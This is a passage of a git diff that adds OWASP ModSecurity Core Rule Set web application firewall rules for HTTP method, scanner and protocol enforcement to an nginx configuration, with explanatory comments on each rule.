chain" + SecRule REQUEST_LINE "@rx ^(?:GET /|OPTIONS \*) HTTP/[12]\.[01]$" \ + "t:none,\ + ctl:ruleRemoveByTag=OWASP_CRS,\ + ctl:auditEngine=Off" diff --git a/nginx/config/owasp-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf b/nginx/config/owasp-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf new file mode 100644 index 00000000..2831bc0f --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf @@ -0,0 +1,76 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) +# + +# +# -=[ Allowed Request Methods ]=- +# +# tx.allowed_methods is defined in the crs-setup.conf file +# +SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \ + "id:911100,\ + phase:1,\ + block,\ + msg:'Method is not allowed by policy',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-generic',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/274',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +# +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-911-METHOD-ENFORCEMENT" diff --git a/nginx/config/owasp-crs/rules/REQUEST-913-SCANNER-DETECTION.conf b/nginx/config/owasp-crs/rules/REQUEST-913-SCANNER-DETECTION.conf new file mode 100644 index 00000000..519634ab --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-913-SCANNER-DETECTION.conf @@ -0,0 +1,86 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) +# + +# +# -=[ Security Scanner Checks ]=- +# +# This rule inspects the default User-Agent and Header values sent by +# various commercial and open source scanners, mostly +# security / vulnerability scanners. +# +# It is based on a curated list of known malicious scanners in widespread use. +# This list is maintained in scanners-user-agents.data. +# +# With CRSv4, the project has given up on keeping track of different categories +# of scanners and scripting agents, mostly because it's very hard to draw +# a line between benign, mostly benign and malicious. And because dedicated +# attackers will change the user agent anyways. + +SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \ + "id:913100,\ + phase:1,\ + block,\ + capture,\ + t:none,\ + msg:'Found User-Agent associated with security scanner',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-reputation-scanner',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/118/224/541/310',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +# +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-913-SCANNER-DETECTION" diff --git a/nginx/config/owasp-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf b/nginx/config/owasp-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf new file mode 100644 index 00000000..93981872 --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf @@ -0,0 +1,1865 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# Some protocol violations are common in application layer attacks. +# Validating HTTP requests eliminates a large number of application layer attacks. +# +# The purpose of this rules file is to enforce HTTP RFC requirements that state how +# the client is supposed to interact with the server. +# https://www.rfc-editor.org/rfc/rfc9110.html + + + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) +# + +# +# Validate request line against the format specified in the HTTP RFC +# +# -=[ Rule Logic ]=- +# +# Uses rule negation against the regex for positive security. The regex specifies the proper +# construction of URI request lines such as: +# +# "http" "://" authority path-abempty [ "?" query ] +# +# It also outlines proper construction for CONNECT, OPTIONS and GET requests. +# +# Regular expression generated from regex-assembly/920100.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 920100 +# +# -=[ References ]=- +# https://www.rfc-editor.org/rfc/rfc9110.html#section-4.2.1 +# http://capec.mitre.org/data/definitions/272.html +# +SecRule REQUEST_LINE "!@rx (?i)^(?:get /[^#\?]*(?:\?[^\s\v#]*)?(?:#[^\s\v]*)?|(?:connect (?:(?:[0-9]{1,3}\.){3}[0-9]{1,3}\.?(?::[0-9]+)?|[\--9A-Z_a-z]+:[0-9]+)|options \*|[a-z]{3,10}[\s\v]+(?:[0-9A-Z_a-z]{3,7}?://[\--9A-Z_a-z]*(?::[0-9]+)?)?/[^#\?]*(?:\?[^\s\v#]*)?(?:#[^\s\v]*)?)[\s\v]+[\.-9A-Z_a-z]+)$" \ + "id:920100,\ + phase:1,\ + block,\ + t:none,\ + msg:'Invalid HTTP Request Line',\ + logdata:'%{request_line}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" + + +# +# Identify multipart/form-data name evasion attempts +# +# There are possible impedance mismatches between how +# ModSecurity interprets multipart file names and how +# a destination app server such as PHP might parse the +# Content-Disposition data: +# +# filename-parm := "filename" "=" value +# +# -=[ Rule Logic ]=- +# These rules check for the existence of the ' " ; = meta-characters in +# either the "name" (FILES) and "filename" (FILES_NAMES) variables. +# HTML entities may lead to false positives, which is why +# frequently used ones, such as "ä", are allowed at PL1. +# +# -=[ Targets, characters and html entities ]=- +# +# 920120 + 920122: PL1 : FILES_NAMES, FILES +# Disallow ['\";=], except for frequently used HTML entities (see 920120.data). +# +# 920121: PL2 : FILES_NAMES, FILES +# Disallow ['\";=] +# +# -=[ References ]=- +# http://www.ietf.org/rfc/rfc2183.txt +# +# This rule used to use negative look-behind. +# See https://github.com/coreruleset/coreruleset/wiki/Technical-Decisions-and-Best-Practices#avoiding-negative-look-behind-in-regular-expressions +# for an explanation of why it now uses `!@rx` instead to avoid look-around. +# +# Regular expression generated from regex-assembly/920120.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 920120 +# +SecRule FILES|FILES_NAMES "!@rx (?i)^(?:&(?:(?:[acegiln-or-suz]acut|[aeiou]grav|[ain-o]tild)e|[c-elnr-tz]caron|(?:[cgk-lnr-t]cedi|[aeiouy]um)l|[aceg-josuwy]circ|[au]ring|a(?:mp|pos)|nbsp|oslash);|[^\"';=])*$" \ + "id:920120,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Attempted multipart/form-data bypass',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# Accept only digits in content length +# +# -=[ Rule Logic ]=- +# This rule uses ModSecurity's rule negation against the regex meaning if the Content-Length header +# is NOT all digits, then it will match. +# +# -=[ References ]=- +# https://www.rfc-editor.org/rfc/rfc9110.html#section-8.6 +# +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920160,\ + phase:1,\ + block,\ + t:none,\ + msg:'Content-Length HTTP header is not numeric',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# Do not accept GET or HEAD requests with bodies +# In RCF-9110, "A client SHOULD NOT generate content in a HEAD/GET request +# unless it is made directly to an origin server that has previously indicated" +# +# -=[ Rule Logic ]=- +# The chained rule matches when: +# 1) If the request method is GET or HEAD +# AND +# 2) Header: Content-Length exists and non-zero +# +# -=[ References ]=- +# https://www.rfc-editor.org/rfc/rfc9110.html#section-9.3.1 +# https://www.rfc-editor.org/rfc/rfc9110.html#section-9.3.2 +# +SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \ + "id:920170,\ + phase:1,\ + block,\ + t:none,\ + msg:'GET or HEAD Request with Body Content',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule REQUEST_HEADERS:Content-Length "!@rx ^0?$" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# This is a sibling of rule 920170 +# +SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \ + "id:920171,\ + phase:1,\ + block,\ + t:none,\ + msg:'GET or HEAD Request with Transfer-Encoding',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule &REQUEST_HEADERS:Transfer-Encoding "!@eq 0" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# Require Content-Length or Transfer-Encoding to be provided with +# every POST request if the protocol version is not HTTP/2 or HTTP/3. +# +# In case of HTTP/2, see the RFC7540 8.1 p52: +# HTTP/2 does not use the Transfer-Encoding: chunked anymore, because +# the underlying transport protocol is already using data frames with +# known length. +# +# In case of HTTP/3, see the RFC9114 4.1: +# Transfer codings (see Section 7 of [HTTP/1.1]) are not defined for +# HTTP/3; the Transfer-Encoding header field MUST NOT be used. +# +# -=[ Rule Logic ]=- +# This chained rule checks if the protocol is not HTTP/2 or HTTP/3, +# then checks request method is POST, if so, it checks that a +# Content-Length or Transfer-Encoding headers are also present. +# +SecRule REQUEST_PROTOCOL "!@within HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0" \ + "id:920180,\ + phase:1,\ + block,\ + t:none,\ + msg:'POST without Content-Length or Transfer-Encoding headers',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + chain" + SecRule REQUEST_METHOD "@streq POST" \ + "chain" + SecRule &REQUEST_HEADERS:Content-Length "@eq 0" \ + "chain" + SecRule &REQUEST_HEADERS:Transfer-Encoding "@eq 0" \ + "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" + +# +# As per RFC7230 3.3.2: A sender MUST NOT send a Content-Length +# header field in any message that contains a Transfer-Encoding header +# field. +# +# Related to 920170, 920171 and 920180. +# +SecRule &REQUEST_HEADERS:Transfer-Encoding "!@eq 0" \ + "id:920181,\ + phase:1,\ + block,\ + t:none,\ + msg:'Content-Length and Transfer-Encoding headers present',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + chain" + SecRule &REQUEST_HEADERS:Content-Length "!@eq 0" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" + + +# +# Range Header Check +# +# RFC7233 2.1 p6: +# "A byte-range-spec is invalid if the last-byte-pos value is present +# and less than the first-byte-pos." +# +# -=[ Rule Logic ]=- +# This rule compares the first and second byte ranges and flags +# when the first value is greater than the second. +# +# -=[ References ]=- +# https://datatracker.ietf.org/doc/html/rfc7233 +# https://seclists.org/fulldisclosure/2011/Aug/175 +# +SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx (\d+)-(\d+)" \ + "id:920190,\ + phase:1,\ + block,\ + capture,\ + t:none,\ + msg:'Range: Invalid Last Byte Value',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + chain" + SecRule TX:2 "@lt %{tx.1}" \ + "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" + + +# +# Broken/Malicious clients often have duplicate or conflicting headers +# Automated programs and bots often do not obey the HTTP RFC +# +# -=[ Rule Logic ]=- +# This rule inspects the Connection header and looks for duplicates of the +# keep-alive and close options. +# +# -=[ References ]=- +# https://datatracker.ietf.org/doc/html/rfc7233 +# +SecRule REQUEST_HEADERS:Connection "@rx \b(?:keep-alive|close),\s?(?:keep-alive|close)\b" \ + "id:920210,\ + phase:1,\ + block,\ + t:none,\ + msg:'Multiple/Conflicting Connection Header Data Found',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" + +# +# Check URL encodings +# +# -=[ Rule Logic ]=- +# There are two different chained rules. We need to separate them as we are inspecting two +# different variables - REQUEST_URI and REQUEST_BODY. For REQUEST_BODY, we only want to +# run the @validateUrlEncoding operator if the content-type is application/x-www-form-urlencoding. +# +# -=[ References ]=- +# http://www.ietf.org/rfc/rfc1738.txt +# +# -=[ Example payload ]=- +# http://localhost/?s=a%20b%20c%'/ +# reason: %'/ is not a valid url encoding +# +SecRule REQUEST_URI "@rx \x25" \ + "id:920220,\ + phase:1,\ + block,\ + t:none,\ + msg:'URL Encoding Abuse Attack Attempt',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/267/72',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + chain" + SecRule REQUEST_URI "@validateUrlEncoding" \ + "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" + +SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)application/x-www-form-urlencoded" \ + "id:920240,\ + phase:2,\ + block,\ + t:none,\ + msg:'URL Encoding Abuse Attack Attempt',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/267/72',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + chain" + SecRule REQUEST_BODY "@rx \x25" \ + "chain" + SecRule REQUEST_BODY "@validateUrlEncoding" \ + "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" + + +# +# Check UTF encoding +# We only want to apply this check if UTF-8 encoding is actually used by the site, otherwise +# it will result in false positives. +# +# -=[ Rule Logic ]=- +# This chained rule first checks to see if the admin has set the TX:CRS_VALIDATE_UTF8_ENCODING +# variable in the crs-setup.conf file. +# +SecRule TX:CRS_VALIDATE_UTF8_ENCODING "@eq 1" \ + "id:920250,\ + phase:2,\ + block,\ + t:none,\ + msg:'UTF8 Encoding Abuse Attack Attempt',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/267',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + chain" + SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES "@validateUtf8Encoding" \ + "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" + + +# +# Disallow use of full-width unicode as decoding evasions may be possible. +# +# -=[ Rule Logic ]=- +# This rule looks for full-width encoding by looking for %u followed by 2 'f' +# characters and then 2 hex characters. It is a vulnerability that affected +# IIS circa 2007. +# The rule will trigger on %uXXXX formatted chars that are full or half +# width, as explained above. This %uXXXX format is passed as a raw parameter +# and is (seemingly only) accepted by IIS (5.0, 6.0, 7.0, and 8.0). Other +# webservers will only process unicode chars presented as hex UTF-8 bytes. +# +# -=[ References ]=- +# http://www.kb.cert.org/vuls/id/739224 +# https://www.checkpoint.com/defense/advisories/public/2007/cpai-2007-201.html +# https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/719 +# +# Regular expression generated from regex-assembly/920260.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 920260 +# +SecRule REQUEST_URI|REQUEST_BODY "@rx (?i)%uff[0-9a-f]{2}" \ + "id:920260,\ + phase:2,\ + block,\ + t:none,\ + msg:'Unicode Full/Half Width Abuse Attack Attempt',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-iis',\ + tag:'platform-windows',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/267/72',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" + + +# +# Restrict type of characters sent +# +# This is a rule with multiple stricter siblings that grows more +# restrictive in higher paranoia levels. +# +# -=[ Rule Logic ]=- +# This rule uses the @validateByteRange operator to restrict the request +# payloads. +# +# -=[ Targets and ASCII Ranges ]=- +# +# 920270: PL1 : REQUEST_URI, REQUEST_HEADERS, ARGS and ARGS_NAMES +# ASCII 1-255 : Full ASCII range without null character +# +# 920271: PL2 : REQUEST_URI, REQUEST_HEADERS, ARGS and ARGS_NAMES +# ASCII 9,10,13,32-126,128-255 : Full visible ASCII range, tab, newline +# +# 920272: PL3 : REQUEST_URI, REQUEST_HEADERS, ARGS, ARGS_NAMES and REQUEST_BODY +# ASCII 32-36,38-126 : Visible lower ASCII range without percent symbol +# +# 920273: PL4 : ARGS, ARGS_NAMES and REQUEST_BODY +# ASCII 38,44-46,48-58,61,65-90,95,97-122 +# A-Z a-z 0-9 = - _ . , : & +# +# 920274: PL4 : REQUEST_HEADERS without User-Agent, Referer, Cookie +# and Structured Header booleans +# ASCII 32,34,38,42-59,61,65-90,95,97-122 +# A-Z a-z 0-9 = - _ . , : & " * + / SPACE +# +# REQUEST_URI and REQUEST_HEADERS User-Agent, Referer and Cookie are very hard +# to restrict beyond the limits in 920272. Structured Header booleans are +# validated separately in 920275. +# +# 920274 generally has few positives. However, it would detect rare attacks +# on Accept request headers and friends. + +SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 1-255" \ + "id:920270,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request (null character)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# Do not accept requests without common headers. +# All normal web browsers include Host, User-Agent and Accept headers. +# Implies either an attacker or a legitimate automation client. +# + +# +# Missing/Empty Host Header +# +# -=[ Rule Logic ]=- +# These rules will first check to see if a Host header is present. +# The second check is to see if a Host header exists but is empty. +# +SecRule &REQUEST_HEADERS:Host "@eq 0" \ + "id:920280,\ + phase:1,\ + pass,\ + t:none,\ + msg:'Request Missing a Host Header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}',\ + skipAfter:END-HOST-CHECK" + + +SecRule REQUEST_HEADERS:Host "@rx ^$" \ + "id:920290,\ + phase:1,\ + block,\ + t:none,\ + msg:'Empty Host Header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecMarker "END-HOST-CHECK" + + +# +# Empty Accept Header +# +# -=[ Rule Logic ]=- +# This rule checks if an Accept header exists, but has an empty value. +# This is only allowed in combination with the OPTIONS method. +# Additionally, there are some clients sending empty Accept headers. +# They are covered in another chained rule checking the User-Agent. +# This technique demands a separate rule to detect an empty +# Accept header if there is no user agent. This is checked via +# the separate rule 920311. +# +# Exclude some common broken clients sending empty Accept header: +# "Business/6.6.1.2 CFNetwork/758.5.3 Darwin/15.6.0" (CRS issue #515) +# "Entreprise/6.5.0.177 CFNetwork/758.4.3 Darwin/15.5.0" (CRS issue #366) +# +# -=[ References ]=- +# https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/366 +# + +SecRule REQUEST_HEADERS:Accept "@rx ^$" \ + "id:920310,\ + phase:1,\ + pass,\ + t:none,\ + msg:'Request Has an Empty Accept Header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'NOTICE',\ + chain" + SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \ + "chain" + SecRule REQUEST_HEADERS:User-Agent "!@pm AppleWebKit Android Business Enterprise Entreprise" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.notice_anomaly_score}'" + +# +# This rule is a sibling of rule 920310. +# +SecRule REQUEST_HEADERS:Accept "@rx ^$" \ + "id:920311,\ + phase:1,\ + pass,\ + t:none,\ + msg:'Request Has an Empty Accept Header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'NOTICE',\ + chain" + SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \ + "chain" + SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.notice_anomaly_score}'" + + +# +# Empty User-Agent Header +# +# -=[ Rule Logic ]=- +# This rules will check to see if the User-Agent header is empty. +# +# Note that there is a second rule, 920320, which will check for +# the existence of the User-Agent header. +# + +SecRule REQUEST_HEADERS:User-Agent "@rx ^$" \ + "id:920330,\ + phase:1,\ + pass,\ + t:none,\ + msg:'Empty User Agent Header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + 